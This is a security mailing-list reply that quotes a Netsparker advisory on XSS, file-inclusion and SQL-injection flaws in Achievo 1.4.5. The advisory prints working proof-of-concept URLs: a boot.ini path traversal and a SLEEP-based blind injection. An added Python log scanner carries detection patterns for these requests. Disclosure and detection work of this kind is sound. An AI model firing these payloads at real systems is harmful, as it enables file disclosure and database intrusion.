BugTraq
Re: [Full-disclosure] XSS, LFI and SQL Injection Vulnerabilities in Achievo Nov 02 2012 06:37AM
Henri Salo (henri nerv fi)
On Thu, Nov 01, 2012 at 02:12:10PM +0200, Netsparker Advisories wrote:
> Information
> --------------------
> Name : XSS, LFI and SQL Injection Vulnerabilities in Achievo
> Software : Achievo 1.4.5 and possibly below.
> Vendor Homepage : http://www.achievo.org
> Vulnerability Type : Cross-Site Scripting, Local File Inclusion and SQL
> Injection
> Severity : Critical
> Researcher : Canberk Bolat
> Advisory Reference : NS-12-016
>
> Description
> --------------------
> Achievo is a flexible web-based resource management tool for business
> environments. Achievo's resource management capabilities will enable
> organisations to support their business processes in a simple, but
> effective manner.
>
> Details
> --------------------
> Achievo is affected by XSS, LFI and SQL Injection vulnerabilities in
> version 1.4.5.
> XSS: http://example.com/dispatch.php (GET: atklevel, atkaction, atkstackid,
> atkselector, atkfilter, searchString)
> LFI:
> http://example.com/dispatch.php?atkaction=search&atknodetype=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00.search&searchstring=3
> SQL Injection:
> http://example.com/achievo-1.4.5/dispatch.php?atknodetype=employee.userprefs&atkaction=edit&atkselector=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)&atklevel=-1&atkprevlevel=0&=3
> You can read the full article about Cross-Site Scripting, LFI and SQL
> Injection vulnerabilities from here:
>
> Cross-site Scripting (XSS):
> http://www.mavitunasecurity.com/crosssite-scripting-xss/
> Local File Inclusion: http://www.mavitunasecurity.com/local-file-inclusion/
> Blind SQL Injection: http://www.mavitunasecurity.com/blind-sql-injection/
>
> Solution
> --------------------
> -
>
> Advisory Timeline
> --------------------
> 23/01/2011 - First contact
> 25/02/2012 - Second contact - No response
> 01/11/2012 - Advisory released
>
> Credits
> --------------------
> It was discovered during testing of Netsparker, Web Application Security
> Scanner - http://www.mavitunasecurity.com/netsparker/.
>
> References
> --------------------
> Vendor Url / Patch : -
> MSL Advisory Link :
> http://www.mavitunasecurity.com/xss-lfi-and-sql-injection-vulnerabilities-in-achievo/
> Netsparker Advisories :
> http://www.mavitunasecurity.com/netsparker-advisories/
>
> About Netsparker
> --------------------
> Netsparker® can find and report security issues such as SQL Injection and
> Cross-site Scripting (XSS) in all web applications regardless of the
> platform and the technology they are built on. Netsparker's unique
> detection and exploitation techniques allow it to be dead accurate in
> reporting, hence it's the first and the only False Positive Free web
> application security scanner.

Where did you report this vulnerability? The Achievo project does reply to emails and fix security vulnerabilities. Does this vulnerability have a CVE identifier, which would help in communication?

I can report this to the project again and request a CVE identifier if needed. Please confirm that this is OK for you.

- Henri Salo
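As an added example, not part of the thread and not Achievo's or Netsparker's code, a small access-log triage script that flags the three request shapes the advisory describes against dispatch.php: an atknodetype that is not a plain `module.node` name (the LFI vector), SQL keywords in atkselector (the blind injection vector), and markup in the parameters listed as reflected (XSS). The log lines are constructed for the demo; the parameter names are the ones from the advisory.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache access-log lines (not real traffic). The request URIs
# follow the shapes in the advisory; IPs, timestamps and sizes are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Nov/2012:06:37:00 +0000] "GET /dispatch.php?atkaction=search&atknodetype=project.project&searchString=foo HTTP/1.1" 200 512
10.0.0.9 - - [02/Nov/2012:06:37:05 +0000] "GET /dispatch.php?atkaction=search&atknodetype=..%2f..%2f..%2fboot.ini%00.search&searchString=3 HTTP/1.1" 200 128
10.0.0.9 - - [02/Nov/2012:06:37:31 +0000] "GET /achievo-1.4.5/dispatch.php?atknodetype=employee.userprefs&atkaction=edit&atkselector=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)&atklevel=-1 HTTP/1.1" 200 64
10.0.0.7 - - [02/Nov/2012:06:38:00 +0000] "GET /dispatch.php?atkaction=view&atknodetype=employee.employee&atkselector=employee.id%3D%2712%27 HTTP/1.1" 200 900
10.0.0.8 - - [02/Nov/2012:06:38:20 +0000] "GET /dispatch.php?atkaction=search&atknodetype=project.project&searchString=%3Cb%3Ehi HTTP/1.1" 200 400
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')
NODETYPE_RE = re.compile(r"^[A-Za-z0-9_]+\.[A-Za-z0-9_]+$")  # legitimate module.node shape
SQL_RE = re.compile(r"\bSELECT\b|\bSLEEP\s*\(", re.IGNORECASE)
# Parameters the advisory lists as reflected without encoding.
REFLECTED = ("atklevel", "atkaction", "atkstackid", "atkselector", "atkfilter", "searchString")

def classify(line):
    """Return the findings for one access-log line (empty list if clean)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/dispatch.php"):
        return []
    # parse_qs decodes once; decode again so double-encoded payloads are seen too.
    params = {k: [unquote(v) for v in vs]
              for k, vs in parse_qs(url.query, keep_blank_values=True).items()}
    findings = []
    for value in params.get("atknodetype", []):
        if ".." in value or "\x00" in value or not NODETYPE_RE.match(value):
            findings.append("lfi:atknodetype")
    for value in params.get("atkselector", []):
        if SQL_RE.search(value):
            findings.append("sqli:atkselector")
    for name in REFLECTED:
        if any("<" in v for v in params.get(name, [])):
            findings.append("xss:" + name)
    return findings

def scan(log_text):
    """Return (client_ip, findings) for every flagged line, in log order."""
    out = []
    for line in log_text.splitlines():
        findings = classify(line)
        if findings:
            out.append((line.split()[0], findings))
    return out
```

Requests that do not reach dispatch.php are ignored, and a normal selector such as `employee.id='12'` is left alone, so the rules stay narrow enough to run over real logs.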
